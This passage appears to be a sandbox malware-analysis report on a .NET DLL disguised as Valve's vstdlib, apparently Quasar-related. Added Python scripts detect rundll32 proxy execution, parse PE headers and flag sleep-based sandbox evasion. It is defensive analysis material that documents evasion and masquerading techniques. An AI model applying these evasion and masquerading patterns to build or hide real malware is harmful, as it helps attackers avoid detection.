Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_FixDoubleSlashes
Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_FixSlashes
Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_IsAbsolutePath
Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_vsnwprintf
Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncpy
Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncat_length
Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncat
Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_snprintf
Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_UTF8ToUTF16
Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_UTF16ToUTF8
Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_StripTrailingSlash
Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_StripLastDir
Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_RemoveDotSlashes
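A caveat worth keeping in mind when reading the process list above: loaddll64.exe is Joe Sandbox's own DLL harness, not part of the sample. It enumerates the sample's export table and launches rundll32.exe once per export (the V_* names, which imitate the export surface of Valve's Source-engine vstdlib, as the file name also does), and it launches ordinal #1 through cmd.exe /C. So every rundll32.exe line here is sandbox-driven; on a real endpoint the same command lines, minus the loaddll64.exe ancestry, are the signal. The script below is an added example (not code from the report or from Joe Sandbox) that parses "Process created" lines in the report's format and flags rundll32.exe launches that load a DLL from a user-writable directory, call an export by ordinal, or are spawned by cmd.exe, while marking sandbox-loader parents so they are not mistaken for the sample's own chain. The sample lines are copied from the list above; the set of "user-writable" directory names is an assumption of this example.

```python
import re
from pathlib import PureWindowsPath

# Constructed input: "Process created" lines in the report's own format (parent image,
# then the child's image and command line), copied from the process list above.
SAMPLE_LINES = [
    r'Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1',
    r'Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1 Jump to behavior',
    r'Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixSlashes',
    r'Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1',
]

# Tolerates the report's run-together "exeProcess created:" form, an optional ";"
# separator, and a trailing "Jump to behavior" link label.
LINE_RE = re.compile(
    r"Source:\s*(?P<parent>.+?)\s*;?\s*Process created:\s*(?P<image>\S+)\s+(?P<cmdline>.*?)\s*(?:Jump to behavior)?\s*$"
)
# rundll32 <dll>,<export>; the DLL path may or may not be quoted, the export may be "#N".
RUNDLL_RE = re.compile(r'rundll32\.exe\s+"?(?P<dll>[^",]+?)"?\s*,\s*(?P<export>\S+)', re.IGNORECASE)

# Assumed set of directories an unprivileged user can write to. A Microsoft-signed host
# such as rundll32.exe loading a DLL from one of these is the proxy-execution pattern
# MITRE tracks as T1218.011.
USER_WRITABLE = {"desktop", "downloads", "appdata", "temp", "public"}
SANDBOX_LOADER = "loaddll64.exe"  # Joe Sandbox's DLL harness; its children are harness-driven


def parse_line(line: str):
    """Split one 'Process created' line into parent image, child image and command line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {"parent": m["parent"], "image": m["image"], "cmdline": m["cmdline"]}


def is_user_writable(path: str) -> bool:
    parts = {p.lower() for p in PureWindowsPath(path).parts}
    return "users" in parts and bool(parts & USER_WRITABLE)


def triage_rundll32(lines):
    """Return every rundll32.exe launch together with the reasons it deserves a look."""
    hits = []
    for line in lines:
        ev = parse_line(line)
        if ev is None or PureWindowsPath(ev["image"]).name.lower() != "rundll32.exe":
            continue
        m = RUNDLL_RE.search(ev["cmdline"])
        if m is None:
            continue
        dll, export = m["dll"], m["export"]
        parent = PureWindowsPath(ev["parent"]).name.lower()
        reasons = []
        if is_user_writable(dll):
            reasons.append("dll in user-writable path")
        if export.startswith("#"):
            reasons.append("export called by ordinal")
        if parent == "cmd.exe":
            reasons.append("spawned by cmd.exe")
        if parent == SANDBOX_LOADER:
            reasons.append("parent is the sandbox DLL loader (loaddll64.exe)")
        hits.append({"parent": parent, "dll": dll, "export": export, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in triage_rundll32(SAMPLE_LINES):
        print(hit["parent"], "->", hit["dll"], hit["export"], "|", "; ".join(hit["reasons"]))
```

Against the constructed sample the ordinal-#1 launch from cmd.exe collects three reasons, while the V_FixSlashes launch is attributed to the harness; on EDR telemetry, drop the harness rule and the remaining reasons are the hunting criteria.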
Source: C:\Windows\System32\loaddll64.exe; Section loaded: apphelp.dll
Source: C:\Windows\System32\loaddll64.exe; Section loaded: mscoree.dll
Source: C:\Windows\System32\loaddll64.exe; Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\loaddll64.exe; Section loaded: version.dll
Source: C:\Windows\System32\loaddll64.exe; Section loaded: kernel.appcore.dll
Source: Window Recorder; Window detected: More than 3 window changes detected
Source: vstdlib_s64.dll.dll; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: vstdlib_s64.dll.dll; Static PE information: Virtual size of .text is bigger than: 0x100000
Source: vstdlib_s64.dll.dll; Static PE information: Image base 0x180000000 > 0x60000000
Source: vstdlib_s64.dll.dll; Static file information: File size 7477096 > 1048576
Source: vstdlib_s64.dll.dll; Static PE information: Raw size of .text is bigger than: 0x100000 < 0x71de00
Source: vstdlib_s64.dll.dll; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
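The static PE findings above can be reproduced with a few header reads: a non-zero IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR (data directory slot 14) means the file is a managed assembly that mscoree.dll will hand to the CLR, which is consistent with the mscoree.dll load and the CLR_v4.0\UsageLogs\rundll32.exe.log file listed earlier, regardless of the native-looking vstdlib file name; the image base, .text sizes and DllCharacteristics come from the PE32+ optional header and the section table. The following is an added example, not code from the report or from Joe Sandbox. To run offline it constructs a headers-only PE32+ blob with the same properties the report lists (CLR directory set, image base 0x180000000, .text virtual size over 0x100000 and raw size 0x71de00, DLL characteristics DYNAMIC_BASE|NX_COMPAT|NO_SEH|TERMINAL_SERVER_AWARE); the remaining builder values (alignments, subsystem, RVAs, CLR header RVA and size) are assumptions and not the sample's actual header. Point inspect_pe32plus() at the bytes of a real 64-bit DLL to get the same dictionary for it.

```python
import struct

PE32_PLUS_MAGIC = 0x20B
IMAGE_FILE_DLL = 0x2000
COM_DESCRIPTOR_INDEX = 14  # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR: the CLR (.NET) header

# IMAGE_DLLCHARACTERISTICS_* bits, named the way the report prints them.
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT",
    0x0400: "NO_SEH",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}
SECTION_FLAGS = {
    0x00000020: "IMAGE_SCN_CNT_CODE",
    0x20000000: "IMAGE_SCN_MEM_EXECUTE",
    0x40000000: "IMAGE_SCN_MEM_READ",
    0x80000000: "IMAGE_SCN_MEM_WRITE",
}


def flag_names(value, table):
    return [name for bit, name in sorted(table.items()) if value & bit]


def inspect_pe32plus(data: bytes) -> dict:
    """Parse the DOS, COFF, optional and section headers of a PE32+ image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != PE32_PLUS_MAGIC:
        raise ValueError("only PE32+ (64-bit) images are handled here")
    image_base = struct.unpack_from("<Q", data, opt + 24)[0]   # 8-byte ImageBase in PE32+
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    num_dirs = struct.unpack_from("<I", data, opt + 108)[0]
    clr_rva = clr_size = 0
    if num_dirs > COM_DESCRIPTOR_INDEX:
        clr_rva, clr_size = struct.unpack_from("<II", data, opt + 112 + 8 * COM_DESCRIPTOR_INDEX)

    sections = []
    for i in range(nsections):  # section table follows the optional header
        off = opt + opt_size + 40 * i
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, _vaddr, rawsize, _rawptr = struct.unpack_from("<IIII", data, off + 8)
        sflags = struct.unpack_from("<I", data, off + 36)[0]
        sections.append({"name": name, "virtual_size": vsize, "raw_size": rawsize,
                         "flags": flag_names(sflags, SECTION_FLAGS)})

    info = {
        "machine": machine,
        "is_dll": bool(chars & IMAGE_FILE_DLL),
        "image_base": image_base,
        "dll_characteristics": flag_names(dll_chars, DLL_CHARACTERISTICS),
        "is_dotnet": clr_rva != 0 and clr_size != 0,
        "sections": sections,
    }
    info["findings"] = triage(info)
    return info


def triage(info: dict) -> list:
    """The static checks the report lists for this sample, as plain strings."""
    findings = []
    if info["is_dotnet"]:
        findings.append("CLR header present: managed (.NET) assembly, whatever the file name suggests")
    if info["image_base"] > 0x60000000:
        findings.append(f"image base {info['image_base']:#x} > 0x60000000")
    for s in info["sections"]:
        if s["virtual_size"] > 0x100000:
            findings.append(f"virtual size of {s['name']} {s['virtual_size']:#x} > 0x100000")
        if s["raw_size"] > 0x100000:
            findings.append(f"raw size of {s['name']} {s['raw_size']:#x} > 0x100000")
    return findings


def build_sample_pe32plus(image_base=0x180000000, dll_chars=0x8540, text_vsize=0x71D000,
                          text_rawsize=0x71DE00, clr_rva=0x2008, clr_size=0x48) -> bytes:
    """Constructed headers-only PE32+ DLL mirroring the report's static findings.
    Alignment, subsystem and RVA values are assumptions, not the sample's real header."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, len(dos))                      # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 240, 0x2022)  # AMD64, 1 section, EXECUTABLE|LARGE_ADDRESS_AWARE|DLL
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, PE32_PLUS_MAGIC)
    struct.pack_into("<Q", opt, 24, image_base)
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)                  # section / file alignment
    struct.pack_into("<H", opt, 68, 2)                               # IMAGE_SUBSYSTEM_WINDOWS_GUI
    struct.pack_into("<H", opt, 70, dll_chars)
    struct.pack_into("<I", opt, 108, 16)                             # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 112 + 8 * COM_DESCRIPTOR_INDEX, clr_rva, clr_size)
    sect = bytearray(40)
    sect[:5] = b".text"
    struct.pack_into("<IIII", sect, 8, text_vsize, 0x1000, text_rawsize, 0x400)
    struct.pack_into("<I", sect, 36, 0x60000020)                     # CNT_CODE | MEM_EXECUTE | MEM_READ
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(sect)


if __name__ == "__main__":
    for finding in inspect_pe32plus(build_sample_pe32plus())["findings"]:
        print(finding)
```

The COM descriptor check is the one that matters for this sample: a file named like a native Source-engine library but carrying a CLR header will be executed by the .NET runtime inside whichever host loads it, here rundll32.exe, which is why the Quasar Yara hits above sit in rundll32.exe memory.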
Source: C:\Windows\System32\rundll32.exe; Process information set: NOOPENFILEERRORBOX (159 identical entries)
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 922337203685477 (observed 2 times)
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 589
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 2827
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 357
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 410
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 5565
Source: C:\Windows\System32\rundll32.exe Window / User API: foregroundWindowGot 1774
Source: C:\Windows\System32\loaddll64.exe TID: 6848 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 7424 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 7424 Thread sleep time: -100000s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 7424 Thread sleep time: -99875s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 7424 Thread sleep time: -99766s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 7424 Thread sleep time: -99655s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 7424 Thread sleep time: -99532s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 7424 Thread sleep time: -99407s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 7424 Thread sleep time: -99282s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 7424 Thread sleep time: -99157s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 7424 Thread sleep time: -99032s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 7424 Thread sleep time: -98907s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 6996 Thread sleep time: -410000s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 6996 Thread sleep time: -5565000s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 7424 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\loaddll64.exe Thread delayed: delay time: 120000
Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 100000
Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 99875
Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 99766
Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 99655
Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 99532
Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 99407
Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 99282
Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 99157
Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 99032
Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 98907
Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\rundll32.exe Memory allocated: page read and write | page guard
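The sleep and "Window / User API" lines above are the raw observations behind the "May sleep (evasive loops)", "Contains long sleeps (>= 3 min)" and "high number of Window / User specific system calls" signatures. The script below is an added example, not part of the Joe Sandbox report and not Quasar code, that parses lines in this format and summarises them per thread: total finite sleep, sleeps at or above the 3 minute mark, sentinel-sized delays such as 922337203685477, and a heuristic for a decreasing re-sleep series like the 100000, 99875, 99766 ... run on TID 7424. Reading the values as milliseconds, the 10-year "indefinite" cutoff and the re-sleep heuristic are assumptions made for this example; the embedded sample is a constructed subset of this report's own lines.

```python
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# 3 minutes mirrors the report's own "Contains long sleeps (>= 3 min)" signature; the
# 10-year cutoff is an assumption so that only sentinel-sized delays (922337203685477,
# about 29,000 years if read as milliseconds) count as "indefinite".
LONG_SLEEP_MS = 3 * 60 * 1000
INDEFINITE_MS = 10 * 365 * 24 * 3600 * 1000

# Line shapes as printed in the report; delay values are treated as milliseconds
# (assumption: the report prints an "s" suffix, but the magnitudes only make sense as ms).
SLEEP_RE = re.compile(r"Source: (?P<proc>\S+) TID: (?P<tid>\d+) Thread sleep time: -(?P<ms>\d+)s >= -\d+s")
WINAPI_RE = re.compile(r"Source: (?P<proc>\S+) Window / User API: (?P<api>\w+) (?P<count>\d+)")

# Constructed sample: a subset of this report's timing lines, in the report's own format.
SAMPLE_REPORT = r"""
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 589
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 2827
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 5565
Source: C:\Windows\System32\rundll32.exe Window / User API: foregroundWindowGot 1774
Source: C:\Windows\System32\loaddll64.exe TID: 6848 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 7424 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 7424 Thread sleep time: -100000s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 7424 Thread sleep time: -99875s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 7424 Thread sleep time: -99766s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 7424 Thread sleep time: -99655s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 7424 Thread sleep time: -99532s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 7424 Thread sleep time: -99407s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 6996 Thread sleep time: -410000s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 6996 Thread sleep time: -5565000s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 7424 Thread sleep time: -922337203685477s >= -30000s
"""


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def parse_sleeps(report: str) -> List[Tuple[str, int, int]]:
    """(process basename, tid, delay_ms) for every 'Thread sleep time' line, in order."""
    return [(_base(m["proc"]), int(m["tid"]), int(m["ms"]))
            for m in map(SLEEP_RE.search, report.splitlines()) if m]


def parse_user_api(report: str) -> Dict[Tuple[str, str], int]:
    """{(process basename, api): summed call count} from 'Window / User API' lines."""
    counts: Dict[Tuple[str, str], int] = defaultdict(int)
    for m in map(WINAPI_RE.search, report.splitlines()):
        if m:
            counts[(_base(m["proc"]), m["api"])] += int(m["count"])
    return dict(counts)


def is_resleep_run(delays: List[int], min_len: int = 4) -> bool:
    """Heuristic (an assumption, not a Joe Sandbox rule): a run of strictly decreasing
    delays that shrink by at most a second each looks like a loop that re-issues the
    remaining wait after every wake-up, one way to defeat sandbox sleep acceleration."""
    run = 1
    for prev, cur in zip(delays, delays[1:]):
        run = run + 1 if 0 < prev - cur <= 1000 else 1
        if run >= min_len:
            return True
    return False


def assess(report: str) -> Dict[str, object]:
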